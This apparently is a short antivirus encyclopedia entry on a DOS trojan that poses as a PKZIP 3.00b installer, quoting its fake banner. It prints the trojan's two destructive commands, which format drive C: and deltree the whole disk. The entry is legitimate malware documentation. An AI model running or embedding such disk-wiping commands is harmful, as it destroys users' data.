PKZ300b

A trojan named PKZIP300 was discovered in the wild. It is distributed as a self-extracting archive named PKZ300B.EXE, 178981 bytes long. Only one file is the trojan itself: PKZINST.EXE. It was written in Turbo Pascal. When executed, it displays the message:

 PKZIP (R) Install Utility   Version 3.00b  4-05-950
 Copr. 1989-1995 Pkware Inc. All Rights Reserved.
 Pkzip Reg. U.S. Pat. and Tm. Off.

 Initializing, this may take a few minutes....

and executes two commands:

 COMMAND.COM /C Format c: > NULL
 COMMAND.COM /C deltree /y c:\ > NULL

Fortunately, the author of the trojan did not have enough computer knowledge, and the first command just waits for DOS confirmation:

 WARNING: ALL DATA ON NON-REMOVABLE DISK
 DRIVE C: WILL BE LOST!
 Proceed with Format (Y/N)?